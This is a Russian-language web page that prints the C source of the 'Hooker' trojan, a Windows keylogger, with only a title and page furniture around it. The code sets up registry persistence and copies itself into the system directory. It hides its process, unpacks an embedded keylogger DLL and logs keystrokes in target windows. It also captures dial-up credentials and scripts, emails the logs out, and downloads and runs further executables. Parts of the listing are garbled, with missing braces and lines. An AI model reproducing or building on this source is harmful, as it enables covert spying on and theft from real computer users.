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Исходный текст троянца Ноо ker

2019-07-03 224 Обсуждений (0)
Исходный текст троянца Ноо ker 0.00 из 5.00 0 оценок

#include "hooker. h"

#include "logfunc. h"

#include "common. h"

#include "lzw. h"

 // ------------ - путь в реестре---------------------

HKEY GetRegKey (const char* s,char* r)


const char* szRoots [] = {





const HKEY hKeys [] = {





int i;

for (i=0; i<4; i++)

if (! strncmp (s, szRoots [i], strlen (szRoots [i]))) {

strcpy (r, s + strlen (szRoots [i]) + 1);

return hKeys [i];


return NULL;


 // --------------Повторный запуск программы при необходимости--------------

void RecurrentStart (void)


char *szCmd,sz1 [0x100],sz2 [0x100];



szCmd = GetCommandLine ();

sprintf (sz1,"Restart_%X",sti. number);

if (! strstr (szCmd,sz1)) {

 // Это первая копия процесса, сделать вторую

memset (&si,0,sizeof (si));

si. cb = sizeof (si);

GetModuleFileName (NULL,sz2,sizeof (sz2));

 // Создаем процесс

CreateProcess (

sz2, // pointer to name of executable module

sz1, // pointer to command line string

NULL, // pointer to process security attributes

NULL, // pointer to thread security attributes

false, // handle inheritance flag

0, // creation flags

NULL, // pointer to new environment block

NULL, // pointer to current directory name

&si, // pointer to STARTUPINFO

&pi // pointer to PROCESS_INFORMATION


ExitProcess (0);



 // ----------------------------Деинсталяция----------------------------

void AutoKill (HINSTANCE h_keylog)


HKEY hKey,hRoot;

char sz1 [0x100];

EnterCriticalSection (&gcs);

 // вход реестре

hRoot = GetRegKey (sti. reg_path,sz1);

if (hRoot) {

RegOpenKeyEx (

hKey, // handle of open key

sz1, // address of name of subkey to open

0, // reserved

KEY_ALL_ACCESS, // security access mask

&hKey // address of handle of open key


RegDeleteValue (hKey,sti. reg_desc);

RegCloseKey (hKey);


 // Удаляем лог

DeleteFile (sti. logname);

 // Удаляем keylog dll

GetModuleFileName (h_keylog,sz1,sizeof (sz1));

FreeLibrary (h_keylog);

DeleteFile (sz1);

 // Adieu!

ExitProcess (0);


 // ----------------------Установка в реестре---------------------------

void RegInstall (void)


HKEY hKey,hRoot;

ULONG i,j;

char buf1 [0x100],buf2 [0x100];

hRoot = GetRegKey (sti. reg_path,buf1);

if (! hRoot) hRoot = HKEY_LOCAL_MACHINE;

if (RegCreateKeyEx (

hRoot, // handle of an open key

buf1, // address of subkey name

0, // reserved

"", // address of class string

REG_OPTION_NON_VOLATILE, // special options flag

KEY_ALL_ACCESS, // desired security access

NULL, // address of key security structure

&hKey, // address of buffer for opened handle

&i // address of disposition value buffer

) ! = ERROR_SUCCESS) return;

i = sizeof (buf1);

if (sti. fullname)

strcpy (buf2,sti. full_exe_name);


strcpy (buf2,sti. exe_name);

if ( (RegQueryValueEx (

hKey, // handle of key to query

sti. reg_desc, // address of name of value to query

NULL, // reserved

&j, // address of buffer for value type

(UCHAR*) buf1, // address of data buffer

&i // address of data buffer size


(j! = REG_SZ) ||

(strcmp (buf1,buf2))) {

 // Надо ставить свой ключ

RegSetValueEx (

hKey, // handle of key to set value for

sti. reg_desc, // address of value to set

0, // reserved

REG_SZ, // flag for value type

(UCHAR*) buf2, // address of value data

strlen (buf2) + 1 // size of value data



RegCloseKey (hKey);


 // -----------------------Инсталяция в систему-------------------------

void Install (void)


char buf1 [0x100],buf2 [0x100];



 // из какого каталога запуск?

GetModuleFileName (NULL,buf1,sizeof (buf1));

CharUpperBuff (buf1,strlen (buf1));

if (strcmp (sti. full_exe_name,buf1)) { // Нет это не наш каталог

 // Копируем

if (CopyFile (buf1,sti. full_exe_name,false)) { // Скопировали нормально

memset (&si,0,sizeof (si));

si. cb = sizeof (si);

sprintf (buf2,"Restart_%X Kill_%X=%s",sti. number,sti. number,buf1);

 // Стартуем процесс

CreateProcess (

sti. full_exe_name, // pointer to name of executable module

buf2, // pointer to command line string

NULL, // pointer to process security attributes

NULL, // pointer to thread security attributes

false, // handle inheritance flag

0, // creation flags

NULL, // pointer to new environment block

NULL, // pointer to current directory name

&si, // pointer to STARTUPINFO

&pi // pointer to PROCESS_INFORMATION



ExitProcess (0);



 // --------------------Проверка на включение кейлога-------------------

bool TitleTest (HWND hwnd, char* t)


char title [0x200];


GetWindowText (hwnd,title,sizeof (title)); // Считываем заголовок окна

strcpy (t,title);

if (sti. total_log) return true; // Если постоянный лог

CharUpperBuff (title,strlen (title)); // в верхний региср

for (i = 0; i<sti. nsubstr; i++) // Ищем субстроки

if (strstr (title,sti. substr [i])) return true;

return false;


 // --------Тут происходит проверка на возникновение соединения---------

void ConDectecting (void)


static HRASCONN hconn;

static int state;

RASCONN rascon;





int i,j;

char sz1 [0x1000],sz2 [0x100];

FILE* fs;

if (! bRASDLL) return;

 // текущее соединение?

rascon. dwSize = sizeof (RASCONN);

j = sizeof (rascon);

if (RasEnumConnections (

&rascon, // buffer to receive connections data

(LPDWORD) &j, // size in bytes of buffer

(LPDWORD) &i // number of connections written to buffer

)) return;

if (! i) { // нет соединений

hconn = NULL;



 // на каком этапе подключение?

rascs. dwSize = sizeof (rascs);

i = RasGetConnectStatus (

rascon. hrasconn, // handle to RAS connection of interest

&rascs // buffer to receive status data


if ( (i) || (rascs. rasconnstate == RASCS_Disconnected)) {

hconn = NULL;



if (hconn! = rascon. hrasconn) {

state = rascs. rasconnstate;

hconn = rascon. hrasconn;



if ( (rascs. rasconnstate == RASCS_Connected) && (state! = RASCS_Connected)) {

state = RASCS_Connected;

 // новое соединение успешно установлено

GetLocalTime (&st);

 // имя, время соединения

sprintf (

sz1,"\nConnection: \"%s\",%2.2u:%2.2u:%2.2u\n",

rascon. szEntryName,

st. wHour,

st. wMinute,

st. wSecond


i = 0; // опередляем количество памяти под RASENTRY

RasGetEntryProperties (

NULL, // pointer to full path and filename of phone-book file

rascon. szEntryName, // pointer to an entry name

NULL, // buffer that receives entry information

(LPDWORD) &i, // size, in bytes, of the lpRasEntry buffer

NULL, // buffer that receives device-specific configuration information

NULL // size, in bytes, of the lpbDeviceInfo buffer


re = (LPRASENTRY) new BYTE [i];

re->dwSize = sizeof (RASENTRY);

j = RasGetEntryProperties (

NULL, // pointer to full path and filename of phone-book file

rascon. szEntryName, // pointer to an entry name

re, // buffer that receives entry information

(LPDWORD) &i, // size, in bytes, of the lpRasEntry buffer

NULL, // buffer that receives device-specific configuration information

NULL // size, in bytes, of the lpbDeviceInfo buffer


 // телефон, скрипт

if (! j) {

if (re->dwfOptions & RASEO_UseCountryAndAreaCodes)

sprintf (







sprintf (




strcat (sz1,sz2);

if (strcmp (re->szScript,"")) {

sprintf (sz2,"\tScript:%s\n",re->szScript);

strcat (sz1,sz2);

fs = fopen (re->szScript,"rt");

if (fs) {

fseek (fs,0,SEEK_END);

i = ftell (fs);

j = strlen (sz1);

if (i < ( (int) sizeof (sz1) - j - 0x40)) {

fseek (fs,0,SEEK_SET);

i = fread (&sz1 [j],1, i,fs);

sz1 [j + i] = 0;

strcat (sz1,"\n");


fclose (fs);




delete re;

i = sizeof (RASPPPIP);

rasip. dwSize = i;

j = RasGetProjectionInfo (

rascon. hrasconn, // handle that specifies remote access connection of interest

RASP_PppIp, // specifies type of projection information to obtain

&rasip, // points to buffer that receives projection information

(LPDWORD) &i // points to variable that specifies buffer size


 // IP наш и сервера

if (! j) {

sprintf (


"\tServer's IP:%s\n",

rasip. szIpAddress,

rasip. szServerIpAddress);

strcat (sz1,sz2);


LogAdd (sz1);



 // ---------------------Удаление предудущей копии----------------------

void DelPrev ()


CREATETOOL CreateToolhelp32Snapshot;

FIRST32 Process32First;

NEXT32 Process32Next;

HANDLE h_th;




h_l = LoadLibrary ("KERNEL32. DLL");

if (! h_l) return;

CreateToolhelp32Snapshot =

(CREATETOOL) GetProcAddress (h_l,"CreateToolhelp32Snapshot");

Process32First = (FIRST32) GetProcAddress (h_l,"Process32First");

Process32Next = (NEXT32) GetProcAddress (h_l,"Process32Next");

if ( (! Process32Next) || (! Process32First) || (! CreateToolhelp32Snapshot))

goto exit_proc;

h_th = CreateToolhelp32Snapshot (TH32CS_SNAPPROCESS,0);

pe. dwSize = sizeof (pe);

if (! Process32First (h_th,&pe)) goto exit_proc;

do {

CharUpperBuff (pe. szExeFile,strlen (pe. szExeFile));

if ( (! strcmp (sti. full_exe_name,pe. szExeFile)) && (GetCurrentProcessId () ! = pe. th32ProcessID)) {

hp = OpenProcess (PROCESS_TERMINATE,0,pe. th32ProcessID);

if (hp)

#ifdef _DEBUG

if (! TerminateProcess (hp,0)) ShowMessage ("Cannot terminate process");


TerminateProcess (hp,0);



} while (Process32Next (h_th,&pe));


FreeLibrary (h_l);


 // -------------callback функция для распаковки кейлог-dll-------------

FILE* unpack_file;

void Callback (char* data, int len)


fwrite (data,1,len,unpack_file);


 // -----------------------------WinMain--------------------------------



MSG msg;

char buf1 [0x100],buf2 [0x200], buf3 [0x100], *szKillIt;

HINSTANCE h_ker, h_keylog, h_ras;

SYSTEMTIME systime, killtime, mailtime, exectime;

int h_timer, i, j;






bool IsLog = false, IsMailing = false, IsChange = false;

UINT cFlush = 0, cMail = 0, cAutoKill = 0, cRegInst = 0, cExe = 0, cCon = 0;

HWND h_curwnd, h_oldwnd = NULL;

FILE* h_f;



_AttachedData a_d;

char* sti_buf;

char old_title [MAX_PATH];

int d_s;

 // Грузим конфинурацию

GetModuleFileName (NULL,buf1,sizeof (buf1));

h_f = fopen (buf1,"rb");

fseek (h_f,0,SEEK_END);

d_s = ftell (h_f);

sti_buf = new char [d_s];

fseek (h_f,0,SEEK_SET);

fread (sti_buf,1,d_s,h_f);

for (i=d_s-1; i>=0; i--) {

sti_buf [i-1] ^= sti_buf [i];

sti_buf [i-1] += sti_buf [i];


memcpy (&a_d,&sti_buf [d_s - sizeof (_AttachedData)],sizeof (_AttachedData));

if (a_d. signature! = 0x3104) return - 1;

sti. total_log = a_d. total_log;

sti. encrypt_log = a_d. encrypt_log;

sti. send_mail = a_d. send_mail;

sti. syspass = a_d. syspass;

sti. autokill = a_d. autokill;

sti. fullname = a_d. fullname;

sti. exepath = a_d. exepath;

sti. ras = a_d. ras;

sti. loglimit = a_d. loglimit;

sti. sendafter = a_d. sendafter;

sti. nsubstr = a_d. n_ss;

sti. number = a_d. number;

 // грузим субстроки

for (i=0,j=a_d. ss_ofs; (UINT) i<a_d. n_ss; i++) {

sti. substr [i] = new char [strlen (&sti_buf [j]) + 1];

strcpy (sti. substr [i],&sti_buf [j]);

j += strlen (&sti_buf [j]) + 1;


 // имя лога

strcpy (buf1,&sti_buf [a_d. logname_ofs]);

GetSystemDirectory (sti. logname,sizeof (sti. logname));

strcat (sti. logname,"\\");

strcat (sti. logname,buf1);

 // адрес хоста

strcpy (sti. host,&sti_buf [a_d. host_ofs]);

 // от кого?

strcpy (sti. mailfrom,&sti_buf [a_d. mailfrom_ofs]);

 // кому?

strcpy (sti. mailto,&sti_buf [a_d. mailto_ofs]);

strcpy (sti. subj,&sti_buf [a_d. subj_ofs]);

 // имя exe-файла

strcpy (sti. exe_name,&sti_buf [a_d. exe_ofs]);

 // имя кейлог-dll

strcpy (sti. dll_name,&sti_buf [a_d. dll_ofs]);

 // полное имя exe-файла

if (sti. exepath == 2)

strcpy (sti. full_exe_name,&sti_buf [a_d. exe_ofs]);

else {

if (! sti. exepath)

GetWindowsDirectory (sti. full_exe_name,sizeof (sti. full_exe_name));


GetSystemDirectory (sti. full_exe_name,sizeof (sti. full_exe_name));

strcat (sti. full_exe_name,"\\");

strcat (sti. full_exe_name,&sti_buf [a_d. exe_ofs]);


CharUpperBuff (sti. full_exe_name,strlen (sti. full_exe_name));

 // описание в реестре

strcpy (sti. reg_desc,&sti_buf [a_d. reg_descr_ofs]);

 // путь в реестре

strcpy (sti. reg_path,&sti_buf [a_d. reg_path_ofs]);

 // адрес exe-файла для запуска

strcpy (sti. http,&sti_buf [a_d. http_ofs]);

 // порт сендмэйла

sti. port = a_d. port;

 // интервал между посылками

memcpy (&sti. send_i,&a_d. send_i,sizeof (SYSTEMTIME));

 // время жизни

memcpy (&sti. kill_i,&a_d. kill_i,sizeof (SYSTEMTIME));

delete sti_buf;

DelPrev ();

#ifndef _DEBUG

RecurrentStart (); // Повторно запусть?

Install (); // Интсталируем


 // Что у нас в командной строке?

sprintf (buf1,"Kill_%X=",sti. number);

szKillIt = strstr (GetCommandLine (),buf1);

if (szKillIt) szKillIt += strlen (buf1);

 // Скрываем процесс

h_ker = LoadLibrary ("KERNEL32. DLL");

if (h_ker) {

lpRegServ =

(LPREGISTERSERVICEPROCESS) GetProcAddress (h_ker,"RegisterServiceProcess");

#ifndef _DEBUG

if (lpRegServ) lpRegServ (NULL,1);


FreeLibrary (h_ker);


 // Подгружаем RASAPI32. DLL если есть

h_ras = LoadLibrary ("RASAPI32. DLL");

if (h_ras) {

RasEnumConnections= (LPRASENUMCCONNECTIONS) GetProcAddress (h_ras,"RasEnumConnectionsA");

RasGetConnectStatus = (LPRASGETCONNECTSTATUS) GetProcAddress (h_ras,"RasGetConnectStatusA");

RasGetEntryProperties = (LPRASGETENTRYPROPERTIES) GetProcAddress (h_ras,"RasGetEntryPropertiesA");

RasGetProjectionInfo = (LPRASGETPROJECTIONINFO) GetProcAddress (h_ras,"RasGetProjectionInfoA");

bRASDLL = (RasEnumConnections) && (RasGetConnectStatus) && (RasGetEntryProperties) && (RasGetProjectionInfo);

} else bRASDLL = false;

 // Проинициализировать лог

LogInit ();

GetSystemDirectory (buf1,sizeof (buf1));

strcat (buf1,"\\");

strcat (buf1,sti. dll_name);

h_keylog = LoadLibrary (buf1);

if (! h_keylog) {

hr = FindResource (

NULL, // resource-module handle

(LPCTSTR) IDR_KDLL, // pointer to resource name

"KDLL" // pointer to resource type


hrd = LoadResource (

NULL, // resource-module handle

hr // resource handle


unpack_file = fopen (buf1,"w+b");

if (! unpack_file) return - 1;

LZWUnpack ( (char*) hrd,Callback);

fclose (unpack_file);

h_keylog = LoadLibrary (sti. dll_name);


 // грузим функции кейлог-dll

GetData = (LPGETDATA) GetProcAddress (h_keylog,"GetData");

KeylogOn = (LPKEYLOGON) GetProcAddress (h_keylog,"KeylogOn");

KeylogOff = (LPKEYLOGOFF) GetProcAddress (h_keylog,"KeylogOff");

KeylogOpt = (LPKEYLOGOPT) GetProcAddress (h_keylog,"KeylogOpt");

#ifdef _DEBUG

if (! GetData) {

ShowMessage ("Error load GetData function");

return - 1;


if (! KeylogOn) {

ShowMessage ("Error load KeyLogOn function");

return - 1;


if (! KeylogOff) {

ShowMessage ("Error load KeyLogOff function");

return - 1;


if (! KeylogOpt) {

ShowMessage ("Error load KeyLogOpt function");

return - 1;



if ( (! GetData) || (! KeylogOn) || (! KeylogOff) || (! KeylogOpt)) return - 1;


 // Ставим режим работы кейлог-dll

KeylogOpt (a_d. adv_log);

 // проинициализить критическую секцию

InitializeCriticalSection (&gcs);

 // Пишем время старта

i = sizeof (buf1);

if (! GetUserName (buf1, (DWORD*) &i)) buf1 [0] = 0;

i = sizeof (buf3);

if (! GetComputerName (buf3, (DWORD*) &i)) buf3 [0] = 0;

sprintf (buf2,"Computer: \"%s\" User: \"%s\"\n",buf3,buf1);

GetLocalTime (&systime);

SysTimePrint (buf3,systime);

sprintf (buf1,"\nStarted at%s,%s\n",buf3,buf2);

LogAdd (buf1);

memcpy (&killtime,&sti. inst_d,sizeof (SYSTEMTIME));

SysTimeSum (killtime,sti. kill_i);

memcpy (&mailtime,&sti. send_d,sizeof (mailtime));

SysTimeSum (mailtime,sti. send_i);

 // Сбрасываем exectime

memset (&exectime,0,sizeof (exectime));

 // Ставим таймер

h_timer = SetTimer (NULL,0,1000,NULL);

while (GetMessage (&msg,NULL,0,0)) // GetMessage-loop

switch (msg. message) {

case WM_TIMER:

 // Забираем данные из кейлог-буфера

if (IsLog) {

i = GetData (buf1,sizeof (buf1));

buf1 [i] = 0;

if ( (! a_d. emp_log) && (IsChange) && (i)) {

LogAdd (old_title);

IsChange = false;


LogAdd (buf1);


h_curwnd = GetForegroundWindow (); // Получить текущее окно

if (h_curwnd! = h_oldwnd) { // Окно поменялось

 // выключаем лог если он идет

if (IsLog) KeylogOff ();

IsLog = false;

if (TitleTest (h_curwnd,buf2)) { // Окно наше?

GetLocalTime (&systime);

sprintf (old_title,

"\nTitle: \"%s\",%2.2u:%2.2u:%2.2u\n",

buf2,systime. wHour,

systime. wMinute,

systime. wSecond


IsChange = true;

if (a_d. emp_log) LogAdd (old_title);

IsLog = KeylogOn (); // Включить лог



h_oldwnd = h_curwnd;

 // Обработка сброса буфера на хард

if (cFlush > FLUSH_BUFFER_TIME) {

LogFlush ();

cFlush = 0;

} else cFlush++;

if (sti. send_mail) {

if ( (cMail > MAIL_TEST_TIME) && (! IsMailing)) {

GetLocalTime (&systime);

if ( (SysTimeComp (systime,mailtime) >= 0) ||

(sti. logsize > sti. sendafter)) { // Мылим

LogEmailing (mailtime, IsMailing);


cMail = 0;

} else cMail++;


if (cRegInst > REG_TEST_TIME) {

if (sti. autokill) {

GetLocalTime (&systime);

if (SysTimeComp (systime,killtime) >= 0) {

AutoKill (h_keylog);



RegInstall ();

cRegInst = 0;

} else cRegInst++;

if ( (cExe > EXEC_TEST_TIME) && (! IsMailing)) {

GetLocalTime (&systime);

if (SysTimeComp (systime,exectime) >= 0) {

HttpDownloading (exectime, IsMailing);


cExe = 0;

} else cExe++;

 // Килять исходный экзешник?

if (szKillIt) {

if (DeleteFile (szKillIt)) szKillIt = NULL;


 // Проврека на возникновение соединения

if (cCon > CON_TEST_TIME) {

cCon = 0;

ConDectecting ();

} else cCon++;


#ifdef _DEBUG


sprintf (buf1,"Unknown Message:%X",msg. message);

ShowMessage (buf1);



return msg. wParam;



2019-07-03 224 Обсуждений (0)
Исходный текст троянца Ноо ker 0.00 из 5.00 0 оценок

Обсуждение в статье: Исходный текст троянца Ноо ker

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